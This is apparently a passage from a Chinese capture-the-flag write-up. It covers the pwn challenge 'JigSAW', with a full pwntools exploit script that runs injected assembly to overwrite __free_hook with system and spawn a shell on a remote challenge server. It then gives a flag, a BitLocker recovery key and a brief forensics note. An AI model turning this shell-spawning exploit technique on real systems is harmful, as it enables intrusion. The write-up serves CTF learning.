test函数可以执行输入的汇编代码

利用残留的寄存器r10,r12，分两次写，把__free_hook改为system即可：

add r10, 0x50068 mov r12, r10 sub r10, 0x1496b0 mov qword ptr [r12],r10

exp:

#!usr/bin/env python #-*- coding:utf8 -*- from pwn import * import sys pc="./JigSAW" reomote_addr=["47.104.71.220",10273] elf = ELF(pc) libc = elf.libc context.binary=pc context.terminal=["gnome-terminal",'-x','sh','-c'] if len(sys.argv)==1: # p=process(pc) context.log_level="debug" p=process(pc,env={"LD_PRELOAD":"./libc.so"}) if len(sys.argv)==2 : if 'l' in sys.argv[1]: p=process(pc) if 'r' in sys.argv[1]: p = remote(reomote_addr[0],reomote_addr[1]) if 'n' not in sys.argv[1]: context.log_level="debug" ru = lambda x : p.recvuntil(x,timeout=0.2) sn = lambda x : p.send(x) rl = lambda : p.recvline() sl = lambda x : p.sendline(x) rv = lambda x : p.recv(x) sa = lambda a,b : p.sendafter(a,b) sla = lambda a,b : p.sendlineafter(a,b) shell= lambda :p.interactive() ru7f = lambda : u64(ru('\x7f')[-6:].ljust(8,'\x00')) rv6 = lambda : u64(rv(6) '\x00'*2) def lg(s,addr): print('\033[1;31;40m s-->0x%x\033[0m'%(s,addr)) what_choice="Choice : " ch_add="1" ch_dele="3" ch_edit="2" ch_show="5" what_size="" what_c="iNput:" what_idx="Index? : " def add(idx): # 0x10 5个 ru(what_choice) sl(ch_add) ru(what_idx) sl(str(idx)) def dele(idx): ru(what_choice) sl(ch_dele) ru(what_idx) sl(str(idx)) def edit(idx,c): #0x10 ru(what_choice) sl(ch_edit) ru(what_idx) sl(str(idx)) ru(what_c) sn(c) ## def test(idx): ru(what_choice) sl('4') ru(what_idx) sl(str(idx)) def show(idx): ru(what_choice) sl(ch_show) ru(what_idx) sl(str(idx)) ru("Name:") sl('desh') ru("The result is ") size = ru('\n') print(int(size,10)) ru("Make your Choice:") sl(str(0xffff00000000)) code1 = asm("add r10, 0x50068; mov r12, r10;") code2 = asm("sub r10, 0x1496b0; mov qword ptr [r12], r10") add(0) add(1) add(2) edit(0,code1) edit(1,code2) edit(2,'/bin/sh\x00') test(0) test(1) dele(2) shell()

flag{58591d4d-068f-47ed-9305-a65762917b06}

挂载镜像，在内存中找到密钥

bitlocker密钥 549714-116633-006446-278597-176000-708532-618101-131406

发现一个流量包